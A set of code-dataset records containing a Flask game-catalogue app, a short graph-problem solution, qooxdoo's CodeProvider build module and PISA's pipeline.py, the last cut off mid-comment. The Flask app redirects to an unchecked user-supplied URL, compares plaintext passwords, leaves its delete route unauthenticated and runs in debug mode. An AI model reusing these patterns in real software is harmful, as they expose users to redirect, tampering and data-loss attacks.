session or session['usuario_logado'] is None:\n return redirect(url_for('login'))\n return render_template('home.html', titulo='Jogos do Israel', jogos=listJogos)\n\n@app.route('/novo')\ndef novaTela():\n if 'usuario_logado' not in session or session['usuario_logado'] is None:\n return redirect(url_for('login', proxima=url_for('novaTela')))\n return render_template('novo.html', titulo='Novo jogo')\n\n@app.route('/editar/')\ndef editar(id):\n if 'usuario_logado' not in session or session['usuario_logado'] is None:\n return redirect(url_for('login', proxima=url_for('editar')))\n jogo = jogoDao.busca_por_id(id)\n nomeImagem = recuperaImagem(id)\n # jogoNome = f\"capa{id}.jpg\"\n print(nomeImagem)\n if nomeImagem is None:\n nomeImagem = 'choseImg.png'\n\n return render_template('editar.html', titulo='Editar jogo', jogo=jogo, nomeArquivo=nomeImagem)\n\n@app.route('/criar', methods=['POST'])\ndef adicionaJogo():\n nome = request.form['nome']\n categoria = request.form['categoria']\n console = request.form['console']\n jogoNovo = Jogo(nome, categoria, console)\n jogo = jogoDao.salvar(jogoNovo)\n\n\n arquivo = request.files['arquivo']\n uploadPath = app.config['UPLOADS_PATH']\n timestamp = time.time()\n if arquivo.filename != '':\n arquivo.save(f'{uploadPath}/capa{jogo.id}-{timestamp}.jpg')\n\n return redirect(url_for('home'))\n\n@app.route('/atualizar/', methods=['POST'])\ndef atualizar():\n id = int(request.form['id'])\n nome = request.form['nome']\n categoria = request.form['categoria']\n console = request.form['console']\n\n jogoEditado = Jogo(nome, categoria, console, id=id)\n\n deletaImagem(jogoEditado.id)\n jogoDao.salvar(jogoEditado)\n\n arquivo = request.files['arquivo']\n uploadPath = app.config['UPLOADS_PATH']\n timestamp = time.time()\n if arquivo.filename != '':\n arquivo.save(f'{uploadPath}/capa{jogoEditado.id}-{timestamp}.jpg')\n\n return redirect(url_for('home'))\n\n@app.route('/login')\ndef login():\n proxima = request.args.get('proxima')\n return render_template('login.html', proxima=proxima)\n\n@app.route('/autenticar', methods=['POST'])\ndef auth():\n usuario = usuarioDao.buscar_por_id(request.form['usuario'])\n\n if usuario:\n userLog = Usuario(request.form['usuario'], request.form['usuario'], request.form['senha'])\n if userLog.senha == str(usuario.senha):\n session['usuario_logado'] = userLog.usuario\n flash(userLog.usuario + ' logou com sucesso!')\n proximaPagina = request.form['proxima']\n print(f'proximaPagina: {proximaPagina}')\n return redirect(proximaPagina)\n else:\n flash('Hum... Isso não deu certo. Tente novamente.')\n return redirect(url_for('login'))\n else:\n flash('Hum... Isso não deu certo. 
Tente novamente.')\n return redirect(url_for('login'))\n\n@app.route('/logout')\ndef logout():\n session['usuario_logado'] = None\n flash('Nenhum usuário logado!')\n return redirect(url_for('login'))\n\n@app.route('/excluir/')\ndef excluir(id):\n jogoDao.deletar(id)\n\n return redirect(url_for('home'))\n\n@app.route('/upload/')\ndef imgGenerics(nome_arquivo):\n return send_from_directory('upload', nome_arquivo)\n\ndef recuperaImagem(id: int):\n print(f'recuperaImagem - type(id): {type(id)}')\n print(f'capa{id}')\n\n for nomeArquivo in os.listdir(app.config['UPLOADS_PATH']):\n if f'capa{id}' in nomeArquivo:\n return nomeArquivo\n return None\n\ndef deletaImagem(id: int):\n print(f'deletaImagem - type(id): {type(id)}')\n print(f'capa{id}')\n\n nomeArquivo = recuperaImagem(id)\n if nomeArquivo is not None:\n print(f\"nomeArquivo: {nomeArquivo}\")\n print(f\"path: {os.path.join(app.config['UPLOADS_PATH'], nomeArquivo)}\")\n os.remove(os.path.join(app.config['UPLOADS_PATH'], nomeArquivo))\n\napp.run('127.0.0.1', debug=True, port=2032)","sub_path":"jogoteca.py","file_name":"jogoteca.py","file_ext":"py","file_size_in_byte":4868,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"300687495","text":"import sys\nfrom collections import defaultdict\n\ninput=sys.stdin.readline\n\ndef solution(n, m, st):\n chk = [0] * (n+1)\n\n for i in st[1]:\n chk[i] = 1\n for j in st[i]:\n if chk[j] == 1:\n continue\n chk[j] = 1\n\n chk[1] = 0\n return sum(chk)\n\nN = int(input())\nM = int(input())\nstu = defaultdict(list)\nfor _ in range(M):\n a, b = map(int, input().split())\n stu[a].append(b)\n stu[b].append(a)\nprint(solution(N, M, stu))\n","sub_path":"Graph/[5567]결혼식/[5567]결혼식.py","file_name":"[5567]결혼식.py","file_ext":"py","file_size_in_byte":480,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"149637969","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n################################################################################\n#\n# qooxdoo - the new era of web development\n#\n# http://qooxdoo.org\n#\n# Copyright:\n# 2006-2012 1&1 Internet AG, Germany, http://www.1und1.de\n#\n# License:\n# MIT: https://opensource.org/licenses/MIT\n# See the LICENSE file in the project's top-level directory for details.\n#\n# Authors:\n# * Thomas Herchenroeder (thron7)\n#\n################################################################################\n\nimport re, os, sys, zlib, optparse, types, string, glob, shutil\n\nfrom misc import filetool, textutil, util, json, copytool\nfrom generator import Context as context\nfrom generator.config.Config import ConfigurationError\nfrom generator.code.Class import CompileOptions\nfrom generator.output.Script import Script\n\nglobal inclregexps, exclregexps\n\ndef runProvider(script, generator):\n global inclregexps, exclregexps\n inclregexps = context.jobconf.get(\"provider/include\", [\"*\"])\n exclregexps = context.jobconf.get(\"provider/exclude\", [])\n inclregexps = map(textutil.toRegExp, inclregexps)\n exclregexps = map(textutil.toRegExp, exclregexps)\n # copy class files\n _handleCode(script, generator)\n # generate resource info\n _handleResources(script, generator, filtered=False)\n # generate translation and CLDR files\n _handleI18N(script, generator)\n # writing the dependencies.json is a runLogDependencies job\n\n return\n\n\n##\n# check resId (classId, ...) 
against include, exclude expressions\ndef passesOutputfilter(resId, ):\n # must match some include expressions\n if not filter(None, [x.search(resId) for x in inclregexps]): # [None, None, _sre.match, None, _sre.match, ...]\n return False\n # must not match any exclude expressions\n if filter(None, [x.search(resId) for x in exclregexps]):\n return False\n return True\n\nlibraries = {}\n\ndef _handleCode(script, generator):\n\n approot = context.jobconf.get(\"provider/app-root\", \"./provider\")\n builds = context.jobconf.get(\"provider/compile\", [\"source\"])\n\n for buildtype in builds:\n context.console.info(\"Processing %s version of classes:\\t\" % buildtype, False)\n if buildtype == \"source\":\n targetdir = approot + \"/code\"\n filetool.directory(targetdir)\n elif buildtype == \"build\":\n targetdir = approot + \"/code-build\"\n filetool.directory(targetdir)\n optimize = context.jobconf.get(\"compile-options/code/optimize\", [\"variables\",\"basecalls\",\"strings\"])\n variantsettings = context.jobconf.get(\"variants\", {})\n variantSets = util.computeCombinations(variantsettings)\n else:\n raise ConfigurationError(\"Unknown provider compile type '%s'\" % buildtype)\n\n numClasses = len(script.classesObj)\n for num, clazz in enumerate(script.classesObj):\n context.console.progress(num+1, numClasses)\n # register library (for _handleResources)\n if clazz.library.namespace not in libraries:\n libraries[clazz.library.namespace] = clazz.library\n\n if passesOutputfilter(clazz.id, ):\n classAId = clazz.id.replace(\".\",\"/\") + \".js\"\n targetpath = targetdir + \"/\" + classAId\n filetool.directory(os.path.dirname(targetpath))\n if buildtype == \"source\":\n shutil.copy(clazz.path, targetpath)\n elif buildtype == \"build\":\n compOptions = CompileOptions(optimize, variantSets[0]) # only support for a single variant set!\n code = clazz.getCode(compOptions)\n filetool.save(targetpath, code)\n\n return\n\n\n##\n# Copy resources -- handles both all and #asset-aware\n# - filtered -- whether #asset hints and include/exclude filter will be applied\ndef _handleResources(script, generator, filtered=True):\n\n def createResourceInfo(res, resval):\n resinfo = [ { \"target\": \"resource\", \"data\": { res : resval }} ]\n #filetool.save(approot+\"/data/resource/\" + res + \".json\", json.dumpsCode(resinfo))\n return resinfo\n\n skip_expression = re.compile(r'%s' % '|'.join(filetool.VERSIONCONTROL_DIR_PATTS),re.I)\n\n def copyResource(res, library):\n if skip_expression.search(os.path.basename(res)):\n return\n sourcepath = os.path.join(library.resourcePath, res)\n targetpath = approot + \"/resource/\" + res\n filetool.directory(os.path.dirname(targetpath))\n shutil.copy(sourcepath, targetpath)\n #copier = copytool.CopyTool(context.console)\n #args = ['-x', ','.join(filetool.VERSIONCONTROL_DIR_PATTS), sourcepath, targetpath]\n #copier.parse_args(args)\n #copier.do_work()\n return\n\n # ----------------------------------------------------------------------\n context.console.info(\"Processing resources: \", False)\n approot = context.jobconf.get(\"provider/app-root\", \"./provider\")\n filetool.directory(approot+\"/data\")\n filetool.directory(approot+\"/resource\")\n \n # quick copy of runLogResources, for fast results\n packages = script.packagesSorted()\n parts = script.parts\n variants = script.variants\n\n allresources = {}\n if filtered:\n generator._codeGenerator.packagesResourceInfo(script)\n for packageId, package in enumerate(packages):\n allresources.update(package.data.resources)\n else:\n 
# get the main library\n mainlib = [x for x in script.libraries if x.namespace == script.namespace][0]\n reslist = mainlib.getResources()\n allresources = Script.createResourceStruct(reslist, updateOnlyExistingSprites = False)\n\n # get resource info\n resinfos = {}\n numResources = len(allresources)\n for num,res in enumerate(allresources):\n context.console.progress(num+1, numResources)\n # fake a classId-like resourceId (\"a.b.c\"), for filter matching\n resId = os.path.splitext(res)[0]\n resId = resId.replace(\"/\", \".\")\n if filtered and not passesOutputfilter(resId):\n continue\n resinfos[res] = createResourceInfo(res, allresources[res])\n # extract library name space\n if isinstance(allresources[res], types.ListType): # it's an image = [14, 14, u'png', u'qx' [, u'qx/decoration/Modern/checkradio-combined.png', 0, 0]]\n library_ns = allresources[res][3]\n else: # html page etc. = \"qx\"\n library_ns = allresources[res]\n if library_ns: # library_ns == '' means embedded image -> no copying\n library = libraries[library_ns]\n copyResource(res, library)\n\n filetool.save(approot+\"/data/resource/resources.json\", json.dumpsCode(resinfos))\n\n return\n\n\ndef _handleI18N(script, generator):\n context.console.info(\"Processing localisation data\")\n context.console.indent()\n approot = context.jobconf.get(\"provider/app-root\", \"./provider\")\n\n # get class projection\n class_list = []\n needs_cldr = False\n for classObj in script.classesObj:\n if passesOutputfilter(classObj.id):\n class_list.append(classObj)\n if not needs_cldr and classObj.getHints('cldr'):\n needs_cldr = True\n\n # get i18n data\n context.console.info(\"Getting translations\")\n trans_dat = generator._locale.getTranslationData(class_list, script.variants, script.locales, \n addUntranslatedEntries=True)\n loc_dat = None\n if needs_cldr:\n context.console.info(\"Getting CLDR data\")\n loc_dat = generator._locale.getLocalizationData(class_list, script.locales)\n\n\n # write translation and cldr files\n context.console.info(\"Writing localisation files: \", False)\n numTrans = len(script.locales)\n for num,lang in enumerate(script.locales):\n context.console.progress(num+1, numTrans)\n\n # translations\n if trans_dat:\n transmap = {}\n filename = \"i18n-\" + lang\n targetname = \"i18n-\" + lang\n if lang in trans_dat:\n translations = trans_dat[lang]\n for key in translations:\n if translations[key]:\n transmap[key] = [ { \"target\" : targetname, \"data\" : { key : translations[key] }} ]\n else:\n transmap[key] = [ ]\n filetool.save(approot+\"/data/translation/\"+filename+\".json\", json.dumpsCode(transmap))\n \n # cldr\n if loc_dat:\n localemap = {}\n filename = \"locale-\" + lang\n targetname = \"locale-\" + lang\n # sample: { \"cldr\" : [ { \"target\" : \"locale-en\", \"data\" : {\"alternativeQuotationEnd\":'\"', \"cldr_am\": \"AM\",...}} ]}\n if lang in loc_dat:\n localekeys = loc_dat[lang]\n cldr_entry = [ { \"target\" : targetname, \"data\" : { }} ]\n for key in localekeys:\n if localekeys[key]:\n cldr_entry[0]['data'][key] = localekeys[key]\n localemap['cldr'] = cldr_entry\n filetool.save(approot+\"/data/locale/\"+filename+\".json\", json.dumpsCode(localemap))\n\n context.console.outdent()\n return\n","sub_path":"tool/pylib/generator/output/CodeProvider.py","file_name":"CodeProvider.py","file_ext":"py","file_size_in_byte":9326,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"283877808","text":"#! 
/usr/bin/env python\n\n\"\"\"\nImplementation of the Pipeline object, and a simple script to instantiate and\nrun a pipeline (the outputs of which can be plotted and stored to disk).\n\"\"\"\n\n\nfrom __future__ import absolute_import\n\nfrom argparse import ArgumentParser\nfrom collections import OrderedDict\nfrom configparser import NoSectionError\nfrom copy import deepcopy\nfrom importlib import import_module\nfrom itertools import product\nfrom inspect import getsource\nimport os\nimport traceback\n\nimport numpy as np\n\nfrom pisa import ureg\nfrom pisa.core.events import Data\nfrom pisa.core.map import Map, MapSet\nfrom pisa.core.param import ParamSet\nfrom pisa.core.stage import Stage\nfrom pisa.core.pi_stage import PiStage\nfrom pisa.core.transform import TransformSet\nfrom pisa.core.container import ContainerSet\nfrom pisa.utils.config_parser import PISAConfigParser, parse_pipeline_config\nfrom pisa.utils.fileio import mkdir\nfrom pisa.utils.hash import hash_obj\nfrom pisa.utils.log import logging, set_verbosity\nfrom pisa.utils.profiler import profile\n\n\n__all__ = [\"Pipeline\", \"test_Pipeline\", \"parse_args\", \"main\"]\n\n__author__ = \"J.L. Lanfranchi, P. Eller\"\n\n__license__ = \"\"\"Copyright (c) 2014-2018, The IceCube Collaboration\n\n Licensed under the Apache License, Version 2.0 (the \"License\");\n you may not use this file except in compliance with the License.\n You may obtain a copy of the License at\n\n http://www.apache.org/licenses/LICENSE-2.0\n\n Unless required by applicable law or agreed to in writing, software\n distributed under the License is distributed on an \"AS IS\" BASIS,\n WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n See the License for the specific language governing permissions and\n limitations under the License.\"\"\"\n\n\n# TODO: should we check that the output binning of a previous stage produces\n# the inputs required by the current stage, or that the aggregate outputs that\n# got produced by previous stages (less those that got consumed in other\n# previous stages) hold what the current stage requires for inputs... or\n# should we not assume either will check out, since it's possible that the\n# stage requires sideband objects that are to be introduced at the top of the\n# pipeline by the user (and so there's no way to verify that all inputs are\n# present until we see what the user hands the pipeline as its top-level\n# input)? Alternatively, the lack of apparent inputs for a stage could show\n# a warning message. Or we just wait to see if it fails when the user runs the\n# code.\n\n# TODO: return an OrderedDict instead of a list if the user requests\n# intermediate results? Or simply use the `outputs` attribute of each stage to\n# dynamically access this?\n\n\nclass Pipeline(object):\n \"\"\"Instantiate stages according to a parsed config object; excecute\n stages.\n\n Parameters\n ----------\n config : string, OrderedDict, or PISAConfigParser\n If string, interpret as resource location; send to the\n `config_parser.parse_pipeline_config()` method to get a config\n OrderedDict. 
If `OrderedDict`, use directly as pipeline configuration.\n\n \"\"\"\n\n def __init__(self, config):\n if isinstance(config, (str, PISAConfigParser)):\n config = parse_pipeline_config(config=config)\n elif isinstance(config, OrderedDict):\n pass\n else:\n raise TypeError(\n \"`config` passed is of type %s but must be string,\"\n \" PISAConfigParser, or OrderedDict\" % type(config).__name__\n )\n\n self.pisa_version = None\n\n self._stages = []\n self._detector_name = config.pop('detector_name', None)\n self._config = config\n self._init_stages()\n self._source_code_hash = None\n\n def index(self, stage_id):\n \"\"\"Return the index in the pipeline of `stage_id`.\n\n Parameters\n ----------\n stage_id : string or int\n Name of the stage, or stage number (0-indexed)\n\n Returns\n -------\n idx : integer stage number (0-indexed)\n\n Raises\n ------\n ValueError : if `stage_id` not in pipeline.\n\n \"\"\"\n assert isinstance(stage_id, (int, str))\n for stage_num, stage in enumerate(self):\n if stage_id in [stage_num, stage.stage_name]:\n return stage_num\n raise ValueError('No stage \"%s\" found in the pipeline.' % stage_id)\n\n def __len__(self):\n return len(self._stages)\n\n def __iter__(self):\n return iter(self._stages)\n\n def __getitem__(self, idx):\n if isinstance(idx, str):\n return self.stages[self.index(idx)]\n\n if isinstance(idx, (int, slice)):\n return self.stages[idx]\n\n raise ValueError(\n 'Cannot locate stage \"%s\" in pipeline. Stages'\n \" available are %s.\" % (idx, self.stage_names)\n )\n\n def __getattr__(self, attr):\n for stage in self:\n if stage.stage_name == attr:\n return stage\n raise AttributeError(\n '\"%s\" is neither a stage in this pipeline nor an attribute/property'\n \" of the `Pipeline` object.\" % attr\n )\n\n def _init_stages(self):\n \"\"\"Stage factory: Instantiate stages specified by self.config.\n\n Conventions required for this to work:\n * Stage and service names must be lower-case\n * Service implementations must be found at Python path\n `pisa.stages..`\n * `service` cannot be an instantiation argument for a service\n\n \"\"\"\n stages = []\n data = ContainerSet(\"events\")\n for stage_num, ((stage_name, service_name), settings) in enumerate(\n self.config.items()\n ):\n try:\n logging.debug(\n \"instantiating stage %s / service %s\", stage_name, service_name\n )\n\n # Import service's module\n logging.trace(\"Importing: pisa.stages.%s.%s\", stage_name, service_name)\n module = import_module(\"pisa.stages.%s.%s\" % (stage_name, service_name))\n\n # Get service class from module\n cls = getattr(module, service_name)\n\n # Instantiate service\n logging.trace(\n \"initializing stage %s.%s with settings %s\"\n % (stage_name, service_name, settings)\n )\n service = cls(**settings)\n try:\n service = cls(**settings)\n except Exception as e:\n raise IOError(\n \"Failed to instantiate stage %s.%s with settings %s, error\"\n \" was: %s\" % (service_name, stage_name, settings.keys(), e)\n )\n\n cake_stage = isinstance(service, Stage)\n pi_stage = isinstance(service, PiStage)\n\n if not (cake_stage or pi_stage):\n raise TypeError(\n 'Trying to create service \"%s\" for stage #%d (%s),'\n \" but object %s instantiated from class %s is not a\"\n \" PISA Stage type but instead is of type %s.\"\n % (\n service_name,\n stage_num,\n stage_name,\n service,\n cls,\n type(service),\n )\n )\n\n # first stage can determine type of pipeline\n if self.pisa_version is None:\n self.pisa_version = \"cake\" if cake_stage else \"pi\"\n\n elif self.pisa_version == \"cake\" 
and pi_stage:\n raise TypeError(\n \"Trying to use the PISA Pi Stage in \" \"a PISA cake pipeline.\"\n )\n\n elif self.pisa_version == \"pi\" and cake_stage:\n raise TypeError(\n \"Trying to use the PISA cake Stage in \" \"a PISA Pi pipeline.\"\n )\n\n # Append service to pipeline\n\n if self.pisa_version == \"pi\":\n service.data = data\n # add events object\n\n # run setup on service\n service.setup()\n\n stages.append(service)\n\n except:\n logging.error(\n \"Failed to initialize stage #%d (stage=%s, service=%s).\",\n stage_num,\n stage_name,\n service_name,\n )\n raise\n\n previous_stage = None\n for stage in stages:\n stage.select_params(self.param_selections, error_on_missing=False)\n if previous_stage is not None:\n prev_has_binning = (\n hasattr(previous_stage, \"output_binning\")\n and previous_stage.output_binning is not None\n )\n this_has_binning = (\n hasattr(stage, \"input_binning\") and stage.input_binning is not None\n )\n if this_has_binning != prev_has_binning:\n raise ValueError(\n 'hasattr(%s, \"output_binning\") is %s but'\n ' hasattr(%s, \"input_binning\") is %s.'\n % (\n previous_stage.stage_name,\n prev_has_binning,\n stage.stage_name,\n this_has_binning,\n )\n )\n if this_has_binning:\n is_compat = stage.input_binning.is_compat(\n previous_stage.output_binning\n )\n if not is_compat:\n logging.error(\n \"Stage %s output binning: %s\",\n previous_stage.stage_name,\n previous_stage.output_binning,\n )\n logging.error(\n \"Stage %s input binning: %s\",\n stage.stage_name,\n stage.input_binning,\n )\n raise ValueError(\n \"%s stage's output binning is incompatible with\"\n \" %s stage's input binning.\"\n % (previous_stage.stage_name, stage.stage_name)\n )\n previous_stage = stage\n\n self._stages = stages\n\n # TODO: handle other container(s)\n @profile\n def get_outputs(self, inputs=None, idx=None, return_intermediate=False):\n \"\"\"Run the pipeline to compute its outputs.\n\n Parameters\n ----------\n inputs : None or MapSet\n Optional inputs to send to the first stage of the pipeline.\n\n idx : None, string, or int\n Specification of which stage(s) to run. If None is passed, all\n stages will be run. If a string is passed, all stages are run up to\n and including the named stage. If int is passed, all stages are run\n up to and including `idx`. Numbering follows Python\n conventions (i.e., is 0-indexed).\n\n return_intermediate : bool\n Return list containing outputs from each stage in the pipeline.\n\n Returns\n -------\n outputs : list or pisa.core.map.MapSet\n If `return_intermediate` is `False`, returns `MapSet` output by\n final stage. If `return_intermediate` is `True`, returns `list` of\n `MapSet`s output by each stage.\n\n \"\"\"\n intermediate = []\n\n if isinstance(idx, str):\n idx = self.stage_names.index(idx)\n\n if idx is not None:\n if idx < 0:\n raise ValueError(\"Integer `idx` must be >= 0\")\n idx += 1\n\n if len(self) == 0:\n raise ValueError(\"No stages in the pipeline to run\")\n\n for stage in self.stages[:idx]:\n name = \"{}.{}\".format(stage.stage_name, stage.service_name)\n logging.debug(\n '>> Working on stage \"%s\" service \"%s\"',\n stage.stage_name,\n stage.service_name,\n )\n try:\n logging.trace(\">>> BEGIN: {}.run(...)\".format(name))\n outputs = stage.run(inputs=inputs) # pylint: disable=redefined-outer-name\n if return_intermediate:\n if outputs is None: # e.g. 
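Stripped of the PISA-specific type and binning checks, the stage factory in `_init_stages` above boils down to a dynamic import plus `getattr`. (Note that the original instantiates `cls(**settings)` twice, once outside the try block, which bypasses the IOError wrapping.) A hedged sketch of the core, assuming the `pisa.stages.<stage>.<service>` layout documented in the docstring:

```python
from importlib import import_module

def load_service(stage_name, service_name, **settings):
    # Import pisa.stages.<stage>.<service> and instantiate the class
    # that carries the service's own name.
    module = import_module("pisa.stages.%s.%s" % (stage_name, service_name))
    cls = getattr(module, service_name)
    return cls(**settings)
```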
for PISA pi\n outputs = stage.get_outputs()\n intermediate.append(outputs)\n logging.trace(\">>> END : {}.run(...)\".format(name))\n except:\n logging.error(\n \"Error occurred computing outputs in stage %s /\" \" service %s ...\",\n stage.stage_name,\n stage.service_name,\n )\n raise\n logging.trace(\"outputs: %s\" % (outputs,))\n inputs = outputs\n\n if outputs is None: # e.g. for PISA pi\n outputs = stage.get_outputs()\n\n if return_intermediate:\n return intermediate\n\n return outputs\n\n def update_params(self, params):\n \"\"\"Update params for the pipeline.\n\n Note that any param in `params` in excess of those that already exist\n in the pipeline's stages will have no effect.\n\n Parameters\n ----------\n params : ParamSet\n Parameters to be updated\n\n \"\"\"\n for stage in self:\n stage.params.update_existing(params)\n\n def select_params(self, selections, error_on_missing=False):\n \"\"\"Select a set of alternate param values/specifications.\n\n Parameters\n -----------\n selections : string or iterable of strings\n error_on_missing : bool\n\n Raises\n ------\n KeyError if `error_on_missing` is `True` and any of `selections` does\n not exist in any stage in the pipeline.\n\n \"\"\"\n successes = 0\n for stage in self:\n try:\n stage.select_params(selections, error_on_missing=True)\n except KeyError:\n pass\n else:\n successes += 1\n\n if error_on_missing and successes == 0:\n raise KeyError(\n \"None of the stages in this pipeline has all of the\"\n \" selections %s available.\" % (selections,)\n )\n\n @property\n def params(self):\n \"\"\"pisa.core.param.ParamSet : pipeline's parameters\"\"\"\n params = ParamSet()\n for stage in self:\n params.extend(stage.params)\n return params\n\n @property\n def param_selections(self):\n \"\"\"list of strings : param selections collected from all stages\"\"\"\n selections = set()\n for stage in self:\n selections.update(stage.param_selections)\n return sorted(selections)\n\n @property\n def stages(self):\n \"\"\"list of Stage : stages in the pipeline\"\"\"\n return [s for s in self]\n\n @property\n def stage_names(self):\n \"\"\"list of strings : names of stages in the pipeline\"\"\"\n return [s.stage_name for s in self]\n\n @property\n def config(self):\n \"\"\"Deepcopy of the OrderedDict used to instantiate the pipeline\"\"\"\n return deepcopy(self._config)\n\n @property\n def source_code_hash(self):\n \"\"\"Hash for the source code of this object's class.\n\n Not meant to be perfect, but should suffice for tracking provenance of\n an object stored to disk that were produced by a Stage.\n\n \"\"\"\n if self._source_code_hash is None:\n self._source_code_hash = hash_obj(getsource(self.__class__))\n return self._source_code_hash\n\n @property\n def hash(self):\n \"\"\"int : Hash of the state of the pipeline. 
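`get_outputs` above threads each stage's outputs into the next stage's inputs; the chaining pattern on its own, assuming stage objects that expose a `run(inputs=...)` method as in the loop above:

```python
def run_chain(stages, inputs=None, return_intermediate=False):
    intermediate = []
    outputs = inputs
    for stage in stages:
        # Each stage consumes what the previous stage produced.
        outputs = stage.run(inputs=outputs)
        intermediate.append(outputs)
    return intermediate if return_intermediate else outputs
```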
This hashes together a hash\n of the Pipeline class's source code and a hash of the state of each\n contained stage.\"\"\"\n return hash_obj([self.source_code_hash] + [stage.hash for stage in self])\n\n def __hash__(self):\n return self.hash\n\n\ndef test_Pipeline():\n \"\"\"Unit tests for Pipeline class\"\"\"\n # pylint: disable=line-too-long\n\n #\n # Test: select_params and param_selections\n #\n\n hierarchies = [\"nh\", \"ih\"]\n materials = [\"iron\", \"pyrolite\"]\n\n t23 = dict(ih=49.5 * ureg.deg, nh=42.3 * ureg.deg)\n YeO = dict(iron=0.4656, pyrolite=0.4957)\n\n # Instantiate with two pipelines: first has both nh/ih and iron/pyrolite\n # param selectors, while the second only has nh/ih param selectors.\n pipeline = Pipeline(\n \"tests/settings/test_Pipeline.cfg\"\n ) # pylint: disable=redefined-outer-name\n\n current_mat = \"iron\"\n current_hier = \"nh\"\n\n for new_hier, new_mat in product(hierarchies, materials):\n _ = YeO[new_mat]\n\n assert pipeline.param_selections == sorted([current_hier, current_mat]), str(\n pipeline.params.param_selections\n )\n assert pipeline.params.theta23.value == t23[current_hier], str(\n pipeline.params.theta23\n )\n assert pipeline.params.YeO.value == YeO[current_mat], str(pipeline.params.YeO)\n\n # Select just the hierarchy\n pipeline.select_params(new_hier)\n assert pipeline.param_selections == sorted([new_hier, current_mat]), str(\n pipeline.param_selections\n )\n assert pipeline.params.theta23.value == t23[new_hier], str(\n pipeline.params.theta23\n )\n assert pipeline.params.YeO.value == YeO[current_mat], str(pipeline.params.YeO)\n\n # Select just the material\n pipeline.select_params(new_mat)\n assert pipeline.param_selections == sorted([new_hier, new_mat]), str(\n pipeline.param_selections\n )\n assert pipeline.params.theta23.value == t23[new_hier], str(\n pipeline.params.theta23\n )\n assert pipeline.params.YeO.value == YeO[new_mat], str(pipeline.params.YeO)\n\n # Reset both to \"current\"\n pipeline.select_params([current_mat, current_hier])\n assert pipeline.param_selections == sorted([current_hier, current_mat]), str(\n pipeline.param_selections\n )\n assert pipeline.params.theta23.value == t23[current_hier], str(\n pipeline.params.theta23\n )\n assert pipeline.params.YeO.value == YeO[current_mat], str(pipeline.params.YeO)\n\n # Select both hierarchy and material\n pipeline.select_params([new_mat, new_hier])\n assert pipeline.param_selections == sorted([new_hier, new_mat]), str(\n pipeline.param_selections\n )\n assert pipeline.params.theta23.value == t23[new_hier], str(\n pipeline.params.theta23\n )\n assert pipeline.params.YeO.value == YeO[new_mat], str(pipeline.params.YeO)\n\n current_hier = new_hier\n current_mat = new_mat\n\n\ndef parse_args():\n \"\"\"Parse command line arguments if `pipeline.py` is called as a script.\"\"\"\n parser = ArgumentParser(\n # formatter_class=ArgumentDefaultsHelpFormatter,\n description=\"\"\"Instantiate and run a pipeline from a config file.\n Optionally store the resulting distribution(s) and plot(s) to disk.\"\"\"\n )\n\n required = parser.add_argument_group(\"required arguments\")\n required.add_argument(\n \"-p\",\n \"--pipeline\",\n metavar=\"CONFIGFILE\",\n type=str,\n required=True,\n help=\"File containing settings for the pipeline.\",\n )\n\n parser.add_argument(\n \"-a\",\n \"--arg\",\n metavar=\"SECTION ARG=VAL\",\n nargs=\"+\",\n action=\"append\",\n help=\"\"\"Set config arg(s) manually. 
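`source_code_hash` above fingerprints the class's own source via `inspect.getsource` so artifacts on disk can be traced to the code that produced them; a standalone equivalent, where sha256 stands in for PISA's `hash_obj` helper (an assumption):

```python
import hashlib
from inspect import getsource

def source_code_hash(obj):
    # Any edit to the defining class changes this digest.
    return hashlib.sha256(getsource(type(obj)).encode("utf-8")).hexdigest()
```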
SECTION can be e.g.\n \"stage:\" (like \"stage:flux\", \"stage:reco\", etc.),\n \"pipeline\", and so forth. Arg values specified here take precedence\n over those in the config file, but note that the sections specified\n must already exist in the config file.\"\"\",\n )\n parser.add_argument(\n \"--select\",\n metavar=\"PARAM_SELECTIONS\",\n nargs=\"+\",\n default=None,\n help=\"\"\"Param selectors (separated by spaces) to use to override any\n defaults in the config file.\"\"\",\n )\n parser.add_argument(\n \"--inputs\",\n metavar=\"FILE\",\n type=str,\n help=\"\"\"File from which to read inputs to be fed to the pipeline.\"\"\",\n )\n parser.add_argument(\n \"--only-stage\",\n metavar=\"STAGE\",\n type=str,\n help=\"\"\"Test stage: Instantiate a single stage in the pipeline\n specification and run it in isolation (as the sole stage in a\n pipeline). If it is a stage that requires inputs, these can be\n specified with the --infile argument, or else dummy stage input maps\n (numpy.ones(...), matching the input binning specification) are\n generated for testing purposes.\"\"\",\n )\n parser.add_argument(\n \"--stop-after-stage\",\n metavar=\"STAGE\",\n help=\"\"\"Instantiate a pipeline up to and including STAGE, but stop\n there. Can specify a stage by index in the pipeline config (e.g., 0, 1,\n etc.) or name (e.g., flux, osc, etc.)\"\"\",\n )\n parser.add_argument(\n \"--outdir\",\n metavar=\"DIR\",\n type=str,\n help=\"\"\"Store all output files (data and plots) to this directory.\n Directory will be created (including missing parent directories) if it\n does not exist already. If no dir is provided, no outputs will be\n saved.\"\"\",\n )\n parser.add_argument(\n \"--intermediate\",\n action=\"store_true\",\n help=\"\"\"Store all intermediate outputs, not just the final stage's\n outputs.\"\"\",\n )\n parser.add_argument(\n \"--transforms\",\n action=\"store_true\",\n help=\"\"\"Store all transforms (for stages that use transforms).\"\"\",\n )\n # TODO: optionally store the transform sets from each stage\n # parser.add_argument(\n # '-T', '--transform-file', metavar='FILE', type=str,\n # help='''File into which to store transform(s) from the pipeline.'''\n # )\n parser.add_argument(\"--pdf\", action=\"store_true\", help=\"\"\"Produce pdf plot(s).\"\"\")\n parser.add_argument(\"--png\", action=\"store_true\", help=\"\"\"Produce png plot(s).\"\"\")\n parser.add_argument(\n \"--annotate\", action=\"store_true\", help=\"\"\"Annotate plots with counts per bin\"\"\"\n )\n parser.add_argument(\n \"-v\",\n action=\"count\",\n default=None,\n help=\"\"\"Set verbosity level. Repeat for increased verbosity. -v is\n info-level, -vv is debug-level and -vvv is trace-level output.\"\"\",\n )\n args = parser.parse_args()\n return args\n\n\ndef main(return_outputs=False):\n \"\"\"Run unit tests if `pipeline.py` is called as a script.\"\"\"\n from pisa.utils.plotter import Plotter\n\n args = parse_args()\n set_verbosity(args.v)\n\n # Even if user specifies an integer on command line, it comes in as a\n # 